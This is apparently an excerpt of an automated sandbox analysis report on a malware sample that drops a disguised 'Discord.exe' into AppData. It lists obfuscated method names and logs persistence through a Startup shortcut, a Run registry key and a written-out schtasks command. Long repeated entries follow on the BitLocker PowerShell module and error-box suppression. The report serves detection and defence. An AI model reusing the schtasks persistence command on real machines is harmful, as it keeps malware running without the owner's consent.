                    Source: s3OBQLA3xR.exe, EthTUQiaut.csHigh entropy of concatenated method names: 'gR5ZScRWGE', 'P8Ck7Bercp', '_55RmmAyJ2t', 'zQaaSdJChj', 'oXvpgODT5AQv0KmDPT0SkmsFOncu', '_5w2F92eBYJADRO6xZdtmrW5EAswL', 'RotvUybCrXuKg3iUA6atrkMigMK4', 'gQi6PFKRJsw6IKxzuELSlU9Gs6zv', 'lQ90nuKnXhRmKkfrgSVRsqJHIWYA', 'RbykDHqQWXTLJznyEEt3nvH85xCP'
                    Source: s3OBQLA3xR.exe, GaULpswXIufzTGkabH57dWAWZLAY2FIFLB2IiUzoLOWVlY0Ba2R9rd92KzjGYDa6qNvw9fm4P8nngRNQQ9G.csHigh entropy of concatenated method names: 'fCXp6gdRaP1Ga0BC6yMxRXNP01BSH1K2FLSf00udV2wsPcIZkOGXuoBEtaSpioLacknDjaKmexsXfYZIXPk', 'xVOg5GQNIMvgdG2GcHSwPK6cFDZX8uxSvsscCNbhuKB9TfjfpIyCxl8L7U8lo6LYTJwnXdq16gU4fZ1QqMA', 'vImOKhBDwa5N5bJnMXkUfNua8fGenB5BcZp7PcvVjt83QAqOPseV6QAPhSQCXtbdlcD4B28zsV0mACprxkZ', 'i2nqIY4Th7dW1pwhIXK8CPqAR5icyNuolOvNdSabDwiOPPnUuvib3UZOZAL2tYqRjzRREYUCVMzTycUBy6H', 'wKyzeyqDVhzzUhThgNSx5mBbOTAWAuPO6xzZratl0t6C1Ct9gKMyGFXYAEXuTaR2uGEH9ClO09c1oKCBqz9', 'Dk6fIypn5gh1WOGYgtFzKklTn0WKfqRrXo4KRQJeoCk6FrgHViopsRptlcszMpEPbmw6rBsDVVzgbk3SAk7', 'QRoRxOgEGa1ZQCbaWKD4iDXVlnp9G7xRSxrXxkXfyRHH8BarawMoWU4f7vHUVPCfnvbAuCwkL4eHSFbjccf', 'suzMtiR1YfuSljVWnLq9FyoK7ysScmVdYBYFekilX2qTWARdHnSKTfZj2QsjLDBBLGUlmzzTDRBTXvnxelE', 'EzDSI6NqXosMtNhIdsVBJIMmOaD3oVxWGBd1WidW19loZ4vqAayTevSsEtZDzmE9PDouY98jaLLG8ej5cwo', 'lFENce2C326C8WrMM0xMnFwqA7q9v3cXjEDy3KJ7Gmt9KadoBYIP0UDakw7zHHMRaVlx'
                    Source: Discord.exe.0.dr, CZoQY5TPrA.csHigh entropy of concatenated method names: '_9N48TDzPlp', 'sy68DDUpDh', '_9o87DLQc1n', 'cyDl7x4rnou9y4jNmiVSwBQWGahG', 'ac1VmwfQeZ5rtk0vNqL35KqxW6az', 'rSmDeTUawE7wPP7807wow4Ki45Iq', 'EEE1qt68Ifr4pCwbu32jKghGO3om', 'Zssh28rP4muRkGPC4LeVvpZahTvj', 'x3nVq4KS65LPH72Oi6Bi3vGETwua', 'IGVftO82XPk1jRUnUaOJ5vkRfaxc'
                    Source: Discord.exe.0.dr, jZqCUwrJdKr0z9RYd14cbRFGh4hvyqVQ29P148v6qUG9lxXZEbSwb5XHnXh1nYUDDR1h.csHigh entropy of concatenated method names: 'ohXYP8Uko9U95pjMwnQbLzUFEPdDh1gxY3Lxatao6nOlZFPCfrgY1HTpBlJlmHIGYMzb', 'PWxz7Gney6usw9eueX4CD2LGxqA1z1lnL73Ho9T7auA5xJSyHcdId84TwlZIk5OuWcRB', 'OJKhW1EvmFx7pk4vxpDjrRJvYJ9far7zYuFX4JEepPT1JmfE0O25zdDlGo86EUCxEiwv', 'o6lCx7lhJJ2LMtvK051igoGlPxHUaNrXIZwdZKbdTFp7TTyZV1fYgL8wleOAC4MV5hsr', 'EB0AUSwEn2ZUVM4yxNUc3dtLqy5lqtQiNii6diQvh1jZTJMU9OG90kddybdJ8Q2gPj2g', '_1hHnFcRcTVwKMoVDsztG3aJYzKkVxA3V27zB5I9Efq0R5F7hUoj5J9q2PndboJsZFQbF', 'jTUbfAvi5yCDAYlzI7OvS9HnpoRD6T3mM4ZaJDIN4KmYgmmPFnfn3CkU1On5fFAhtIAL', 'PNZmqOCVf9WZber8xvC3lwmCoSwJzfknoDxAvp8kDmDyBZUOqcXjF5Ss3Dg5CuODA7ut', 'jEtJk6YmDSKTdcK65x6qMNo8jnLwkkJLMC7jrYkbB2ohCx6JPjZgsX04msoW9YkEyY3T', 'iEgdlhIqZOTUNE6aLhSFH5zABLx4EXZmv6nPBdXaYgRwBNBcoQxySObpw5BLb93TsNP5'
                    Source: Discord.exe.0.dr, sobWCqEaS5.csHigh entropy of concatenated method names: 'h1gE9kffIY', 'n2rjTga0nCPTeZiYYZTgtFWpi4jW', '_9KzP4xoYMJSNc9E23pv58qTmrxcV', 'lLlNzB2h8MKY7t1gX6zkhsmjs6Xp', 'FZX4QAuopMG0e4YxMVGoirF7dIs8'
                    Source: Discord.exe.0.dr, 6mxeqGA8sGKwxoWnPU3gFq7MAvGAa88aOk2fUQoaodsFPsM7YR1gydyk9eQg2nc9Um4G.csHigh entropy of concatenated method names: 'K6yUrNFATVoGVqtQ2J7fmVMdUwHyLi29ZHSRSW1wVOLlHyqBumYz1Xf99CfoB4EboXnl', '_0BQ3F0Ehl9xngE4QA0amkyOgawIz7J6HbPSnpgvWVuH', 'YYgUewv3k3mbgAPGphUDp5EOF1tyv3JNnnFvArMiQ0T', 'hcDYmIIenLtT2fh8CVzT1iDyzuaw57N1bFFxvM94x8n', 'yeDmKkRW2lnI4uOuPBBx3bPpflrrf0ROrflKCQbA27d'
                    Source: Discord.exe.0.dr, xvglY57lNk9vQYqTfbKTBIlchHJYPPgp5YJaV63YWyHSbagxNbKBjxAD4KeBAH1BOeu7.csHigh entropy of concatenated method names: 'FRD8GC4inkaTauOGW0yWfUW6CC1TEVmBiP7NEZnYikjgTQ942rLCTBZZd9NdJaA8tz7X', 'bHnkGDpXqFzt70MnWagzYN5yX1smqNOidboKqkKI2eaCWKJXeswzVych0Wp1PIDBTUHu', '_0tGYNqW6Tm3FUaxV9VzNKUey26iSUAImqOuJqHbztjriPY8GRzCh7zALlD1ivxzivv6T', '_8ieB9V4HS3NhLDTdSVkvPiZczbAYydc3mjDJxqiVefVT1IKCPzFkiBsuAJOWP9GZwXkO', 'rH289oWq0fSMYtvt05itzsuNqdayt3CElayt86GY8QGIQJB70HOBi1oeZdIudiSQRP3q', 'kAZ22kEE53ZFygpt8mtUfVWCKUBf1Q2ICnWbzHJkfYuJqlJ2w2iWqKKKowerYv5Xrf2f', 'mELwor4E4WN8BzyKIfwKcue9PQCYI583ocJRxA9z4QyD47PoX7Ss16YnuRPPAn9SIu9y', 'HkS6hhdvSpSdlXnyQBIAVdzj9JBCvvM362mzto0U4gdSak4keKrwEnQ8vODFuEayu2KF', 'ofsUYbfRDOdoLbO9DS5zyu98s4ji1N2dD4vnoc6ROpzjE1QAu303DdlXhrwvcyDKynfw', 'ax1uNjsuN7DgGS4s7RN2NLp29tKDKu6WUCatpY7f9BpiEY09lssUNujchmF17RGoBpwn'
                    Source: Discord.exe.0.dr, U9pHMOisPp.csHigh entropy of concatenated method names: 'V1ebUJOBAV', 'N8Mno0anep', 'El3GnIDnLf', 'ANiwQr3ERh', '_8eC744DY2y', 'MdY7Ll7gYs', 'bzN1Mlomzo', 'VMlY5YX2QA', '_48i9XQq3nG', 'YJaeefkY2s'
                    Source: Discord.exe.0.dr, NRAeYCnbqOCZiFjqnN8SJKmkAMWNrpsv6Rb1U06ICthKqLloDf62JFflqZ6EQmsdumIbzy5s19huEwlg5zQ.csHigh entropy of concatenated method names: 'ligJKKSF1n1mRZKcvTI6chF8QRc8p8mbtBsKgjwJpp50rEb2Ju3RtUXUgwIxEsZD1OvJXNcUPCv8OTygEQi', 'f5uV8pn7lmcIDAa6g8Pl7c7mfzdr9pCz38BqZfC9XiLvFuBcX7IH7pCR4bWsHJMoALRqSuMQlhEO1owX2va', 'rkUPK0TMy82PJ44L80TKiSoKnaTy6dJFUjgYUx8bOsCeB4L1g2Awb3ohBs4xIIYRCkUbomhGu49a1ZGIWFx', 'jMWrGzt4HSckisu6h2mXyDfr6fdcMSau4sajG4ggcL2WoXTiAhumPh6ceCgyC0y5N9IUND4e0lobEBxwnLb', 'fP2RtqhTTC1UT5NKYEGbkkDOcZgbFyyqYgqANKnUFwjXXr1cGz8gDKiRtfQRGYqNRWMqblkTk89Syl4zC8L', 'avkaseHzf1TOnKieFjC2zxWwRkzGPQlPNudU53CY3xyE5hZnBKQt2cOmMmabWZuaRZuf5AYsVpSEKjEKTaY', 'cjPjGgi53fkGbOSu54282n9YtKV9d8U84FmH39z0V4A1tBWTEhpoEYYb42U8C35bX1esYPhj1kctH983EG3', 'Y8u9hBZuHt4IbFMcCnKF6XmwGEKiliKQslqvX1ypJ5jDcMXtlP2QATtLNfDwK0EUinfWLOyBr6nMcl2oL82', 'aZLnZuxmvgWCGnycKXQlANyGMtdkwFQsCxuuvfAyafUPUlGQZabmbcyCCNdVlV3yz29B99FjrbkGt9NlTwi', 'Ps3umLucOhLRAfDMi4gDHYqZNHcMenflp7TaKZ2WUsVPygXehATuqxabxw0236utz4v4k9xhL6CQMDWuM69'
                    Source: Discord.exe.0.dr, EthTUQiaut.csHigh entropy of concatenated method names: 'gR5ZScRWGE', 'P8Ck7Bercp', '_55RmmAyJ2t', 'zQaaSdJChj', 'oXvpgODT5AQv0KmDPT0SkmsFOncu', '_5w2F92eBYJADRO6xZdtmrW5EAswL', 'RotvUybCrXuKg3iUA6atrkMigMK4', 'gQi6PFKRJsw6IKxzuELSlU9Gs6zv', 'lQ90nuKnXhRmKkfrgSVRsqJHIWYA', 'RbykDHqQWXTLJznyEEt3nvH85xCP'
                    Source: Discord.exe.0.dr, GaULpswXIufzTGkabH57dWAWZLAY2FIFLB2IiUzoLOWVlY0Ba2R9rd92KzjGYDa6qNvw9fm4P8nngRNQQ9G.csHigh entropy of concatenated method names: 'fCXp6gdRaP1Ga0BC6yMxRXNP01BSH1K2FLSf00udV2wsPcIZkOGXuoBEtaSpioLacknDjaKmexsXfYZIXPk', 'xVOg5GQNIMvgdG2GcHSwPK6cFDZX8uxSvsscCNbhuKB9TfjfpIyCxl8L7U8lo6LYTJwnXdq16gU4fZ1QqMA', 'vImOKhBDwa5N5bJnMXkUfNua8fGenB5BcZp7PcvVjt83QAqOPseV6QAPhSQCXtbdlcD4B28zsV0mACprxkZ', 'i2nqIY4Th7dW1pwhIXK8CPqAR5icyNuolOvNdSabDwiOPPnUuvib3UZOZAL2tYqRjzRREYUCVMzTycUBy6H', 'wKyzeyqDVhzzUhThgNSx5mBbOTAWAuPO6xzZratl0t6C1Ct9gKMyGFXYAEXuTaR2uGEH9ClO09c1oKCBqz9', 'Dk6fIypn5gh1WOGYgtFzKklTn0WKfqRrXo4KRQJeoCk6FrgHViopsRptlcszMpEPbmw6rBsDVVzgbk3SAk7', 'QRoRxOgEGa1ZQCbaWKD4iDXVlnp9G7xRSxrXxkXfyRHH8BarawMoWU4f7vHUVPCfnvbAuCwkL4eHSFbjccf', 'suzMtiR1YfuSljVWnLq9FyoK7ysScmVdYBYFekilX2qTWARdHnSKTfZj2QsjLDBBLGUlmzzTDRBTXvnxelE', 'EzDSI6NqXosMtNhIdsVBJIMmOaD3oVxWGBd1WidW19loZ4vqAayTevSsEtZDzmE9PDouY98jaLLG8ej5cwo', 'lFENce2C326C8WrMM0xMnFwqA7q9v3cXjEDy3KJ7Gmt9KadoBYIP0UDakw7zHHMRaVlx'
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeFile created: C:\Users\user\AppData\Roaming\Discord.exeJump to dropped file

                    Boot Survival

                    barindex
                    Uses schtasks.exe or at.exe to add and modify task schedules
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Discord" /tr "C:\Users\user\AppData\Roaming\Discord.exe"
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Discord.lnkJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Discord.lnkJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DiscordJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DiscordJump to behavior

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Loading BitLocker PowerShell Module
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
